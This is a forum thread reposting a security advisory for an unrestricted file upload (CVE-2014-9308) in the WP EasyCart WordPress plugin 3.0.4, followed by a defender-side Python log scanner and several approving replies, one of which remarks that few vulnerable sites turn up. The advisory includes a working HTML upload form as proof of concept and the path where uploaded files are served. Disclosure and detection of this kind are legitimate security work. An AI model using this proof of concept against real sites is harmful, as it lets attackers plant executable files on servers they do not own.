WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
#1
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 29-10-2014
# Software Link: https://wordpress.org/plugins/wp-easycart/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9308
# Category: webapps


1. Description

Any registered user can upload any file because of an incorrect if statement inside banneruploaderscript.php.

PHP Code:
http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html 


2. Proof of Concept

Login as regular user (created using wp-login.php?action=register):

PHP Code:
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <input type="hidden" name="datemd5" value="1">
    <input type="file" name="Filedata">
    <input value="Upload!" type="submit">
</form>
The file will be visible at:
PHP Code:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension% 

3. Solution:


Update to version 3.0.9
https://downloads.wordpress.org/plugin/w....3.0.9.zip
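As an added defender-side example (not part of the advisory and not the plugin's own code), the following Python script scans Apache-style access-log lines for the two indicators this advisory implies: POST requests to banneruploaderscript.php and non-image files served from the products/banners/ directory, then correlates both by client IP. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Oct/2014:10:01:02 +0000] "POST /wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Oct/2014:10:01:09 +0000] "GET /wp-content/plugins/wp-easycart/products/banners/test_1.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [29/Oct/2014:10:02:00 +0000] "GET /wp-content/plugins/wp-easycart/products/banners/promo_1.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
10.0.0.8 - - [29/Oct/2014:10:03:00 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths taken from the advisory; matched by suffix so a WordPress install in a subdirectory still hits.
UPLOADER = "/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php"
BANNER_DIR = "/wp-content/plugins/wp-easycart/products/banners/"
# Extensions a banner legitimately needs; anything else served from that directory is suspicious.
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def findings(log_text):
    """Return (kind, ip, path) tuples for requests matching the advisory's indicators."""
    out = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string before matching
        if rec["method"] == "POST" and path.endswith(UPLOADER):
            out.append(("upload_endpoint_post", rec["ip"], path))
        elif BANNER_DIR in path:
            ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
            if ext not in IMAGE_EXTS and rec["status"] == "200":
                out.append(("non_image_banner_served", rec["ip"], path))
    return out

def ips_with_upload_then_fetch(log_text):
    """IPs that POSTed to the uploader and later fetched a non-image from the banner directory."""
    by_ip = defaultdict(set)
    for kind, ip, _ in findings(log_text):
        by_ip[ip].add(kind)
    needed = {"upload_endpoint_post", "non_image_banner_served"}
    return sorted(ip for ip, kinds in by_ip.items() if needed <= kinds)

if __name__ == "__main__":
    for f in findings(SAMPLE_LOG):
        print(f)
    print("IPs to investigate:", ips_with_upload_then_fetch(SAMPLE_LOG))
```

Pair this with the fix the advisory gives (update to 3.0.9) and, as an extra layer, server rules that refuse to execute scripts from the products/banners/ directory.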
#2
Thanks, good job.
#3
Nice. Good job.
#4
A great vulnerability, it needs to be evaluated. Good job, brother.
But very few sites turn up.
#5
I love shopping sites.
#6
Good job, bro.